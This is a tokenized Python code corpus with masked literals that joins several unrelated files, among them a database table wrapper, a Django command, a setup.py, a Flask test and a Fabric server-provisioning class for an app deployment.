new_cols = [ c for c in sorted ( kwds . keys ( ) ) if c not in current_cols ] <EOL> if new_cols : <EOL> if not current_cols : <EOL> self . _create ( new_cols ) <EOL> else : <EOL> self . _add_columns ( new_cols ) <EOL> cmd = "<STR_LIT>" % ( <EOL> '<STR_LIT>' if unique else '<STR_LIT>' , index_name , self . name , cols ) <EOL> self . database ( cmd ) <EOL> def drop_index ( self , ** kwds ) : <EOL> """<STR_LIT>""" <EOL> cols , index_name = self . _index_pattern ( kwds ) <EOL> cmd = '<STR_LIT>' % index_name <EOL> self . database ( cmd ) <EOL> def drop_indexes ( self ) : <EOL> """<STR_LIT>""" <EOL> cmd = "<STR_LIT>" % self . name <EOL> for x in self . database ( cmd ) : <EOL> if x [ <NUM_LIT:1> ] . startswith ( '<STR_LIT>' ) : <EOL> self . database ( '<STR_LIT>' % x [ <NUM_LIT:1> ] ) <EOL> def indexes ( self ) : <EOL> """<STR_LIT>""" <EOL> cmd = "<STR_LIT>" % self . name <EOL> v = [ ] <EOL> for x in self . database ( cmd ) : <EOL> d = { } <EOL> for a in x [ <NUM_LIT:1> ] . split ( '<STR_LIT>' ) [ <NUM_LIT:2> : ] : <EOL> if a . endswith ( '<STR_LIT>' ) : <EOL> d [ a [ : - <NUM_LIT:3> ] ] = <NUM_LIT:1> <EOL> else : <EOL> d [ a [ : - <NUM_LIT:4> ] ] = - <NUM_LIT:1> <EOL> v . append ( d ) <EOL> return v <EOL> def _columns ( self ) : <EOL> """<STR_LIT>""" <EOL> a = self . database ( '<STR_LIT>' % self . name ) <EOL> if a is None : <EOL> return [ ] <EOL> return [ x [ <NUM_LIT:1> ] for x in a ] <EOL> def columns ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ x for x in self . _columns ( ) if x != '<STR_LIT>' ] <EOL> def _add_columns ( self , new_columns ) : <EOL> """<STR_LIT>""" <EOL> self . _validate_column_names ( new_columns ) <EOL> for col in new_columns : <EOL> try : <EOL> self . database ( '<STR_LIT>' % ( self . name , col ) ) <EOL> except xmlrpclib . Fault : <EOL> pass <EOL> def find_one ( self , * args , ** kwds ) : <EOL> """<STR_LIT>""" <EOL> v = list ( self . find ( * args , limit = <NUM_LIT:1> , ** kwds ) ) <EOL> if len ( v ) == <NUM_LIT:0> : <EOL> raise ValueError , "<STR_LIT>" <EOL> return v [ <NUM_LIT:0> ] <EOL> def _where_clause ( self , query , kwds ) : <EOL> """<STR_LIT>""" <EOL> if len ( kwds ) > <NUM_LIT:0> : <EOL> for key , val in kwds . iteritems ( ) : <EOL> val = self . database . client . _coerce_ ( val ) <EOL> if query : <EOL> query += '<STR_LIT>' % ( key , val ) <EOL> else : <EOL> query = '<STR_LIT>' % ( key , val ) <EOL> return '<STR_LIT>' + query if query else '<STR_LIT>' <EOL> def _find_cmd ( self , query = '<STR_LIT>' , fields = None , limit = None , offset = <NUM_LIT:0> , <EOL> order_by = None , batch_size = <NUM_LIT:50> , _rowid = False , _count = False , ** kwds ) : <EOL> """<STR_LIT>""" <EOL> cmd = '<STR_LIT>' if _rowid else '<STR_LIT>' <EOL> if fields is None : <EOL> cmd += '<STR_LIT>' if _count else '<STR_LIT>' <EOL> cmd += '<STR_LIT>' % self . name <EOL> else : <EOL> if isinstance ( fields , str ) : <EOL> fields = [ fields ] <EOL> cmd += '<STR_LIT>' % ( '<STR_LIT:U+002C>' . join ( fields ) , self . name ) <EOL> cmd += self . _where_clause ( query , kwds ) <EOL> if order_by is not None : <EOL> cmd += '<STR_LIT>' % order_by <EOL> batch_size = int ( batch_size ) <EOL> if limit is not None : <EOL> cmd += '<STR_LIT>' % int ( limit ) <EOL> else : <EOL> cmd += '<STR_LIT>' % batch_size <EOL> if offset is not None : <EOL> cmd += '<STR_LIT>' % int ( offset ) <EOL> return cmd <EOL> def count ( self , * args , ** kwds ) : <EOL> """<STR_LIT>""" <EOL> kwds [ '<STR_LIT>' ] = True <EOL> cmd = self . _find_cmd ( * args , ** kwds ) <EOL> return self . database ( cmd ) [ <NUM_LIT:0> ] <EOL> def __iter__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . find ( ) <EOL> def find ( self , query = '<STR_LIT>' , fields = None , batch_size = <NUM_LIT:50> , <EOL> order_by = None , _rowid = False , limit = None , offset = <NUM_LIT:0> , ** kwds ) : <EOL> """<STR_LIT>""" <EOL> cmd = self . _find_cmd ( query = query , fields = fields , batch_size = batch_size , <EOL> _rowid = _rowid , order_by = order_by , <EOL> limit = limit , offset = offset , ** kwds ) <EOL> convert = self . database . client . _coerce_back_ <EOL> while True : <EOL> cols = self . _columns ( ) <EOL> if len ( cols ) == <NUM_LIT:0> : <EOL> return <EOL> v = self . database ( cmd ) <EOL> if fields is None : <EOL> columns = cols <EOL> else : <EOL> columns = fields <EOL> columns = ( [ '<STR_LIT>' ] if _rowid else [ ] ) + columns <EOL> for x in v : <EOL> yield dict ( [ a for a in zip ( columns , [ convert ( y ) for y in x ] ) <EOL> if a [ <NUM_LIT:1> ] is not None ] ) <EOL> if limit is not None or len ( v ) == <NUM_LIT:0> : <EOL> return <EOL> i = cmd . rfind ( '<STR_LIT>' ) <EOL> offset += batch_size <EOL> cmd = cmd [ : i ] + '<STR_LIT>' % offset <EOL> def _insert_statement ( table , cols , on_conflict = None ) : <EOL> """<STR_LIT>""" <EOL> conflict = '<STR_LIT>' % on_conflict if on_conflict else '<STR_LIT>' <EOL> cols = [ '<STR_LIT>' % c for c in cols ] <EOL> return '<STR_LIT>' % ( conflict , table , '<STR_LIT:U+002C>' . join ( cols ) , '<STR_LIT:U+002C>' . join ( [ '<STR_LIT:?>' ] * len ( cols ) ) ) <EOL> def _constant_key_grouping ( d ) : <EOL> """<STR_LIT>""" <EOL> x = { } <EOL> for a in d : <EOL> k = tuple ( a . keys ( ) ) <EOL> if x . has_key ( k ) : <EOL> x [ k ] . append ( a ) <EOL> else : <EOL> x [ k ] = [ a ] <EOL> return x . values ( ) <EOL> server = Server <EOL> client = Client <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import doctest <EOL> class TestServer ( Server ) : <EOL> _test_mode = True <EOL> doctest . testmod ( optionflags = doctest . ELLIPSIS , <EOL> extraglobs = { '<STR_LIT>' : TestServer , '<STR_LIT>' : TestServer } ) </s>
<s> __version__ = <NUM_LIT:0.1> <EOL> __all__ = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] </s>
<s> import sys <EOL> from django . core . management . base import BaseCommand <EOL> from dennis . cmdline import click_run <EOL> class DennisBaseCommand ( BaseCommand ) : <EOL> """<STR_LIT>""" <EOL> def run_from_argv ( self , argv ) : <EOL> self . execute ( * argv ) <EOL> def handle ( self , * args , ** options ) : <EOL> if self . dennis_subcommand in args : <EOL> args = args [ args . index ( self . dennis_subcommand ) + <NUM_LIT:1> : ] <EOL> args = [ '<STR_LIT>' , self . dennis_subcommand ] + list ( args ) <EOL> sys . argv = args <EOL> click_run ( ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> from setuptools import setup , find_packages <EOL> sys . path . append ( '<STR_LIT>' ) <EOL> sys . path . append ( '<STR_LIT>' ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> maintainer = '<STR_LIT>' , <EOL> maintainer_email = '<STR_LIT>' , <EOL> description = __doc__ , <EOL> long_description = open ( '<STR_LIT>' ) . read ( ) , <EOL> packages = find_packages ( ) , <EOL> platforms = [ '<STR_LIT>' ] , <EOL> include_package_data = True , <EOL> zip_safe = False , <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> entry_points = { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' <EOL> ] , <EOL> } , <EOL> tests_require = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> test_suite = '<STR_LIT>' , <EOL> ) </s>
<s> import unittest <EOL> from flask . ext . testing import TestCase <EOL> from tango . app import Tango <EOL> class AppInitTestCase ( TestCase ) : <EOL> def create_app ( self ) : <EOL> return Tango . build_app ( '<STR_LIT>' ) <EOL> def setUp ( self ) : <EOL> self . client = self . app . test_client ( ) <EOL> def tearDown ( self ) : <EOL> pass <EOL> def test_static ( self ) : <EOL> response = self . client . get ( '<STR_LIT>' ) <EOL> self . assertEqual ( response . status_code , <NUM_LIT:200> ) <EOL> def test_config ( self ) : <EOL> self . assertEqual ( self . app . config [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> from . bundletypes import Coords , Tracks , Listfile , Rotfile , Bundle <EOL> from . sfminittypes import ( read_rot_file , write_rot_file , <EOL> read_trans_soln_file , write_trans_soln_file , <EOL> read_edge_weight_file , write_edge_weight_file , <EOL> read_EGs_file , write_EGs_file ) <EOL> from . onedsfm import oneDSfM <EOL> from . transproblem import TransProblem <EOL> from . twoview import ModelList <EOL> from . rotsolver import solve_global_rotations <EOL> from . utils import indices_to_direct , SO3_geodesic_norm , SO3_geodesic_metric <EOL> from . hornsmethod import robust_horn </s>
<s> """<STR_LIT>""" <EOL> VERSION = ( <NUM_LIT:0> , <NUM_LIT:8> , <NUM_LIT:1> , '<STR_LIT>' ) <EOL> __version__ = "<STR_LIT:.>" . join ( map ( str , VERSION [ : - <NUM_LIT:1> ] ) ) <EOL> __release__ = "<STR_LIT:.>" . join ( map ( str , VERSION ) ) <EOL> __author__ = "<STR_LIT>" <EOL> __contact__ = "<STR_LIT>" <EOL> __homepage__ = "<STR_LIT>" <EOL> __docformat__ = "<STR_LIT>" </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import time <EOL> import os <EOL> from fabric . api import sudo , run , env , require , hide , cd , put <EOL> from fabric . contrib . files import upload_template <EOL> from fabric . contrib . project import rsync_project <EOL> from neckbeard . environment_manager import WAIT_TIME <EOL> from neckbeard . brain_wrinkles import BaseProvisioner <EOL> from neckbeard . brain_wrinkles . pstat import ( <EOL> upload_template_changed , <EOL> put_changed , <EOL> ) <EOL> from neckbeard . output import fab_out_opts , fab_quiet_opts <EOL> logger = logging . getLogger ( '<STR_LIT>' ) <EOL> fab_output_hides = fab_out_opts [ logger . getEffectiveLevel ( ) ] <EOL> fab_quiet = fab_quiet_opts [ logger . getEffectiveLevel ( ) ] <EOL> LINKED_DIRS = [ '<STR_LIT>' ] <EOL> LOG_DIR = '<STR_LIT>' <EOL> VENV_PTH = '<STR_LIT>' <EOL> PYTHON_BIN = '<STR_LIT>' % VENV_PTH <EOL> PIP_BIN = '<STR_LIT>' % VENV_PTH <EOL> MEDIA_STORAGE_ROOT = '<STR_LIT>' <EOL> GITHUB_TERRARIUM = '<STR_LIT>' <EOL> ACTIVE_SOURCE_SYMLINK = '<STR_LIT>' <EOL> CONFIG_TPL_DIR = os . path . abspath ( '<STR_LIT>' ) <EOL> EC2_SCRIPTS_TPL_DIR = os . path . abspath ( '<STR_LIT>' ) <EOL> SUPERVISORD = '<STR_LIT>' <EOL> API_ENDPOINT = '<STR_LIT>' <EOL> FILE_OWNER = '<STR_LIT>' <EOL> F_CHOWN = '<STR_LIT>' % ( FILE_OWNER , FILE_OWNER ) <EOL> class AppServerProvisioner ( BaseProvisioner ) : <EOL> """<STR_LIT>""" <EOL> services = [ '<STR_LIT>' ] <EOL> vestigial_packages = [ ] <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( AppServerProvisioner , self ) . __init__ ( * args , ** kwargs ) <EOL> self . modified_services = [ ] <EOL> def start_services ( self ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( "<STR_LIT>" , self . services ) <EOL> for service in self . services : <EOL> with hide ( * fab_quiet ) : <EOL> sudo ( '<STR_LIT>' % service ) <EOL> def stop_services ( self ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( "<STR_LIT>" , self . services ) <EOL> for service in self . services : <EOL> with hide ( * fab_quiet ) : <EOL> sudo ( '<STR_LIT>' % service ) <EOL> def fix_folder_perms ( self ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( "<STR_LIT>" ) <EOL> if self . is_local_db ( ) : <EOL> with hide ( * fab_quiet ) : <EOL> sudo ( '<STR_LIT>' ) <EOL> sudo ( '<STR_LIT>' ) <EOL> with hide ( * fab_quiet ) : <EOL> sudo ( '<STR_LIT>' % F_CHOWN ) <EOL> sudo ( '<STR_LIT>' % F_CHOWN ) <EOL> sudo ( '<STR_LIT>' % F_CHOWN ) <EOL> sudo ( '<STR_LIT>' ) <EOL> sudo ( '<STR_LIT>' ) <EOL> sudo ( '<STR_LIT>' % MEDIA_STORAGE_ROOT ) <EOL> sudo ( '<STR_LIT>' % ( F_CHOWN , MEDIA_STORAGE_ROOT ) ) <EOL> sudo ( '<STR_LIT>' % MEDIA_STORAGE_ROOT ) <EOL> def do_first_launch_config ( self ) : <EOL> self . _do_set_hostname ( ) <EOL> if self . is_local_db ( ) : <EOL> mysql_install = '<STR_LIT>' <EOL> sudo ( mysql_install ) <EOL> logger . info ( "<STR_LIT>" , self . vestigial_packages ) <EOL> for package in self . vestigial_packages : <EOL> with hide ( * fab_output_hides ) : <EOL> result = sudo ( '<STR_LIT>' % package ) <EOL> if result . failed : <EOL> logger . warning ( "<STR_LIT>" , package ) <EOL> logger . warning ( "<STR_LIT>" , result ) <EOL> with hide ( * fab_output_hides ) : <EOL> push_ssl_crt ( ) <EOL> self . _fix_pstat_logging_perms ( ) <EOL> self . _create_db_and_user ( ) <EOL> self . _configure_sphinx ( ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> with hide ( * fab_quiet ) : <EOL> run ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT:U+0020>' % ( VENV_PTH , PIP_BIN , GITHUB_TERRARIUM ) <EOL> ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> with hide ( * fab_quiet ) : <EOL> run ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT:U+0020>' % ( VENV_PTH , PIP_BIN ) <EOL> ) <EOL> if env . get ( '<STR_LIT>' , False ) : <EOL> self . _configure_newrelic ( ) <EOL> def _replace_text_in_files ( self , paths , search , replace ) : <EOL> sudo ( "<STR_LIT>" % ( search , replace , '<STR_LIT:U+0020>' . join ( paths ) ) ) <EOL> def _do_set_hostname ( self ) : <EOL> logger . info ( "<STR_LIT>" ) <EOL> hostname = env . hostname <EOL> logger . info ( '<STR_LIT>' , hostname ) <EOL> with hide ( * fab_output_hides ) : <EOL> self . _append_text_to_line_in_files ( <EOL> [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' % hostname , <EOL> ) <EOL> sudo ( '<STR_LIT>' % hostname ) <EOL> sudo ( '<STR_LIT>' ) <EOL> def do_update ( self , node_role_map , node_roles , first_run = False ) : <EOL> """<STR_LIT>""" <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> logger . info ( "<STR_LIT>" , env . host_string ) <EOL> for ipsec_name , _ in env . ipsec_confs . items ( ) : <EOL> require ( '<STR_LIT>' % ipsec_name ) <EOL> if first_run : <EOL> self . do_first_launch_config ( ) <EOL> self . _stop_celery ( ) <EOL> self . _update_cache_settings ( node_role_map [ '<STR_LIT>' ] [ '<STR_LIT:all>' ] ) <EOL> self . _update_sphinx_settings ( <EOL> node_role_map [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> node_roles , <EOL> ) <EOL> self . _update_celery_backend_settings ( <EOL> node_role_map [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> ) <EOL> ldap_api_nodes = node_role_map [ '<STR_LIT>' ] <EOL> self . _update_ldap_api_endpoint_settings ( <EOL> all_ldap_api_nodes = ldap_api_nodes [ '<STR_LIT:all>' ] , <EOL> same_az_ldap_api_nodes = ldap_api_nodes [ '<STR_LIT>' ] , <EOL> node_roles = node_roles , <EOL> ) <EOL> self . _update_celery_ldap_settings ( node_roles ) <EOL> env . project_root_src = '<STR_LIT>' % env <EOL> source_dir = env . project_root_src <EOL> current_source_dir = None <EOL> if not first_run : <EOL> current_source_dir = env . project_root <EOL> with hide ( * fab_output_hides ) : <EOL> push_source ( <EOL> new_source_dir = source_dir , <EOL> current_source_dir = current_source_dir , <EOL> chown = F_CHOWN , <EOL> chmod = "<STR_LIT>" , <EOL> ) <EOL> self . _make_media_readable ( source_dir ) <EOL> self . _configure_settings_local ( <EOL> source_dir , <EOL> env . pstat_settings , <EOL> chown = F_CHOWN , <EOL> ) <EOL> self . _configure_settings_target ( <EOL> source_dir , <EOL> env . settings_target , <EOL> chown = F_CHOWN , <EOL> ) <EOL> self . configure_terrarium ( source_dir = source_dir , user = FILE_OWNER ) <EOL> self . _activate_new_source ( <EOL> source_dir , <EOL> [ ACTIVE_SOURCE_SYMLINK , env . project_root ] , <EOL> ) <EOL> self . _run_db_migrations ( user = FILE_OWNER ) <EOL> self . _link_storage_dirs ( ) <EOL> self . _configure_webservers ( node_roles ) <EOL> building_search_index = self . _build_search_index ( ) <EOL> self . _create_media_folder ( ) <EOL> self . _collect_static_media ( ) <EOL> self . _create_500_page ( ) <EOL> self . _restart_webservers ( ) <EOL> self . _configure_celery ( node_roles ) <EOL> self . _update_supervisord ( ) <EOL> self . _configure_calabar ( ) <EOL> self . _configure_ipsec ( ) <EOL> self . _start_celery ( ) <EOL> self . _configure_loggly ( ) <EOL> self . _configure_pstat_cron_jobs ( ) <EOL> self . _configure_email_sending ( ) <EOL> if first_run : <EOL> self . _sync_s3_media ( ) <EOL> if building_search_index : <EOL> self . _wait_for_search_indexing ( ) <EOL> self . _ensure_sphinx_running ( ) <EOL> self . _configure_sphinx_cron ( ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> def _activate_new_source ( self , source_dir , active_version_symlinks ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( "<STR_LIT>" ) <EOL> for symlink in active_version_symlinks : <EOL> logger . info ( "<STR_LIT>" , symlink ) <EOL> symlink_dir , _ = os . path . split ( symlink ) <EOL> with hide ( * fab_output_hides ) : <EOL> sudo ( '<STR_LIT>' % symlink_dir ) <EOL> sudo ( '<STR_LIT>' % symlink ) <EOL> sudo ( '<STR_LIT>' % ( source_dir , symlink ) ) <EOL> with hide ( * fab_output_hides ) : <EOL> sudo ( '<STR_LIT>' % source_dir ) <EOL> def configure_terrarium ( self , source_dir , user ) : <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> venv_parent_dir , _ = os . path . split ( VENV_PTH ) <EOL> with hide ( * fab_output_hides ) : <EOL> sudo ( '<STR_LIT>' % ( user , venv_parent_dir ) ) <EOL> with hide ( * fab_output_hides ) : <EOL> sudo ( '<STR_LIT>' % VENV_PTH ) <EOL> pstat = '<STR_LIT>' % source_dir <EOL> args = { <EOL> '<STR_LIT>' : PYTHON_BIN , <EOL> '<STR_LIT>' : '<STR_LIT>' % VENV_PTH , <EOL> '<STR_LIT>' : VENV_PTH , <EOL> '<STR_LIT>' : '<STR_LIT:U+0020>' . join ( [ <EOL> '<STR_LIT>' % ( pstat , req ) <EOL> for req in [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> ] ) , <EOL> } <EOL> args . update ( env ) <EOL> with hide ( * fab_output_hides ) : <EOL> result = sudo ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT:U+0020>' % args , <EOL> user = user , <EOL> ) <EOL> if result . failed : <EOL> logger . critical ( <EOL> '<STR_LIT>' , <EOL> result . return_code , <EOL> ) <EOL> logger . critical ( '<STR_LIT>' , result ) <EOL> exit ( result . return_code ) <EOL> pstat_pth = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT:U+0020>' % source_dir <EOL> ) <EOL> pstat_pth_link = '<STR_LIT>' % VENV_PTH <EOL> with hide ( * fab_output_hides ) : <EOL> sudo ( '<STR_LIT>' % ( pstat_pth , pstat_pth_link ) , user = user ) <EOL> sudo ( '<STR_LIT>' % VENV_PTH ) <EOL> def is_local_db ( self ) : <EOL> if env . db_host == '<STR_LIT:localhost>' : <EOL> return True <EOL> return False <EOL> def _sync_s3_media ( self ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( "<STR_LIT>" ) <EOL> if env . get ( '<STR_LIT>' , False ) : <EOL> with cd ( env . project_root ) : <EOL> cmd = [ <EOL> '<STR_LIT>' % PYTHON_BIN , <EOL> env . bucket_copy [ '<STR_LIT>' ] , <EOL> env . bucket_copy [ '<STR_LIT>' ] , <EOL> env . bucket_copy [ '<STR_LIT>' ] , <EOL> env . bucket_copy [ '<STR_LIT>' ] , <EOL> env . bucket_copy [ '<STR_LIT>' ] , <EOL> env . bucket_copy [ '<STR_LIT>' ] , <EOL> env . bucket_copy [ '<STR_LIT>' ] , <EOL> '<STR_LIT:&>' , <EOL> ] <EOL> logger . info ( u"<STR_LIT>" ) <EOL> with hide ( * fab_output_hides ) : <EOL> run ( '<STR_LIT>' % "<STR_LIT:U+0020>" . join ( cmd ) ) <EOL> def _append_text_to_line_in_files ( <EOL> self , path , line_matching , text_to_append ) : <EOL> sudo ( <EOL> '<STR_LIT>' % ( <EOL> line_matching , text_to_append , '<STR_LIT:U+0020>' . join ( path ) <EOL> ) <EOL> ) <EOL> def _configure_newrelic ( self ) : <EOL> logger . info ( u"<STR_LIT>" ) <EOL> with hide ( * fab_output_hides ) : <EOL> sudo ( '<STR_LIT>' ) <EOL> sudo ( '<STR_LIT>' ) <EOL> def _create_500_page ( self ) : <EOL> logger . info ( u"<STR_LIT>" ) <EOL> with cd ( '<STR_LIT>' % env ) : <EOL> with hide ( * fab_output_hides ) : <EOL> sudo ( <EOL> '<STR_LIT>' % PYTHON_BIN , <EOL> user = '<STR_LIT>' ) <EOL> def _restart_webservers ( self ) : <EOL> logger . info ( "<STR_LIT>" ) <EOL> with hide ( * fab_output_hides ) : <EOL> sudo ( '<STR_LIT>' ) <EOL> sudo_bg ( '<STR_LIT>' ) <EOL> self . _ensure_uwsgi_up ( ) <EOL> def _create_media_folder ( self ) : <EOL> logger . info ( u"<STR_LIT>" ) <EOL> with hide ( * fab_output_hides ) : <EOL> merged_dir = '<STR_LIT>' % env . project_root_src <EOL> sudo ( '<STR_LIT>' % merged_dir ) <EOL> sudo ( '<STR_LIT>' % ( F_CHOWN , merged_dir ) ) <EOL> def _collect_static_media ( self ) : <EOL> logger . info ( u"<STR_LIT>" ) <EOL> with hide ( * fab_output_hides ) : <EOL> with cd ( '<STR_LIT>' % env ) : <EOL> collect = "<STR_LIT>" <EOL> sudo ( collect % PYTHON_BIN , user = '<STR_LIT>' ) <EOL> sudo ( '<STR_LIT>' % ( F_CHOWN , env . project_root ) ) <EOL> def _configure_webservers ( self , node_roles ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( "<STR_LIT>" ) <EOL> with hide ( * fab_quiet ) : <EOL> context = { <EOL> '<STR_LIT>' : env . project_root , <EOL> '<STR_LIT>' : env . pstat_url , <EOL> } <EOL> upload_template ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> context , <EOL> use_sudo = True <EOL> ) <EOL> upload_template ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> context , <EOL> use_sudo = True <EOL> ) <EOL> newrelic_conf = self . conf . get ( '<STR_LIT>' , { } ) <EOL> new_relic_environment = newrelic_conf . get ( '<STR_LIT>' , None ) <EOL> context = { <EOL> '<STR_LIT>' : new_relic_environment , <EOL> } <EOL> changed = upload_template_changed ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> use_sudo = True , <EOL> mode = <NUM_LIT:0> <NUM_LIT> , <EOL> use_jinja = True , <EOL> context = context , <EOL> ) <EOL> if changed : <EOL> self . modified_services . append ( SUPERVISORD ) <EOL> files = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> sudo ( '<STR_LIT>' % ( F_CHOWN , '<STR_LIT:U+0020>' . join ( files ) ) ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> context = { <EOL> '<STR_LIT>' : env . project_root , <EOL> '<STR_LIT>' : env . pstat_url , <EOL> } <EOL> upload_template ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' % env . pstat_url , <EOL> context , <EOL> use_sudo = True , <EOL> ) <EOL> sudo ( '<STR_LIT>' ) <EOL> sudo ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % env <EOL> ) <EOL> def _make_media_readable ( self , source_dir ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( "<STR_LIT>" ) <EOL> site_media = os . path . join ( source_dir , '<STR_LIT>' ) <EOL> with hide ( * fab_output_hides ) : <EOL> sudo ( '<STR_LIT>' % site_media ) <EOL> def _configure_settings_local ( self , source_dir , settings_dict , chown = None ) : <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> settings_dict [ '<STR_LIT>' ] = env . db_name <EOL> settings_dict [ '<STR_LIT>' ] = env . db_user <EOL> settings_dict [ '<STR_LIT>' ] = env . db_host <EOL> settings_dict [ '<STR_LIT>' ] = env . db_password <EOL> settings_dict [ '<STR_LIT>' ] = env . enable_periodic_tasks <EOL> target = '<STR_LIT>' % source_dir <EOL> with hide ( * fab_output_hides ) : <EOL> upload_template ( <EOL> '<STR_LIT>' , <EOL> target , <EOL> context = settings_dict , <EOL> use_jinja = True , <EOL> use_sudo = True , <EOL> template_dir = CONFIG_TPL_DIR , <EOL> ) <EOL> if chown : <EOL> sudo ( '<STR_LIT>' % ( chown , target ) ) <EOL> def _configure_settings_target ( <EOL> self , source_dir , settings_target , chown = None , <EOL> ) : <EOL> logger . info ( "<STR_LIT>" ) <EOL> target = '<STR_LIT>' % source_dir <EOL> with hide ( * fab_output_hides ) : <EOL> upload_template ( <EOL> '<STR_LIT>' , <EOL> target , <EOL> context = { '<STR_LIT>' : settings_target } , <EOL> use_jinja = True , <EOL> use_sudo = True , <EOL> template_dir = CONFIG_TPL_DIR , <EOL> ) <EOL> if chown : <EOL> sudo ( '<STR_LIT>' % ( chown , target ) ) <EOL> def _run_db_migrations ( self , user ) : <EOL> logger . info ( "<STR_LIT>" ) <EOL> with cd ( '<STR_LIT>' % env ) : <EOL> result = sudo ( <EOL> '<STR_LIT>' % PYTHON_BIN , <EOL> user = user ) <EOL> if result . failed : <EOL> logger . critical ( result ) <EOL> logger . critical ( "<STR_LIT>" ) <EOL> exit ( <NUM_LIT:1> ) <EOL> def _create_db_and_user ( self ) : <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> context = { <EOL> '<STR_LIT>' : env . db_user , <EOL> '<STR_LIT:password>' : env . db_password , <EOL> '<STR_LIT>' : env . db_name , <EOL> } <EOL> with hide ( * fab_output_hides ) : <EOL> upload_template ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> mode = <NUM_LIT:0> <NUM_LIT> , <EOL> context = context , <EOL> use_jinja = True , <EOL> template_dir = CONFIG_TPL_DIR , <EOL> ) <EOL> start_mysql_tpl = ( <EOL> "<STR_LIT>" <EOL> ) <EOL> start_mysql_args = ( <EOL> env . db_master_user , <EOL> env . db_master_password , <EOL> env . db_host , <EOL> ) <EOL> start_mysql = start_mysql_tpl % start_mysql_args <EOL> with hide ( * fab_quiet ) : <EOL> run ( "<STR_LIT>" % ( start_mysql , '<STR_LIT>' ) , shell = True ) <EOL> def _configure_sphinx ( self ) : <EOL> """<STR_LIT>""" <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> require ( '<STR_LIT>' ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> context = { <EOL> '<STR_LIT>' : env . db_user , <EOL> '<STR_LIT>' : env . db_password , <EOL> '<STR_LIT>' : env . db_name , <EOL> '<STR_LIT>' : env . db_host , <EOL> 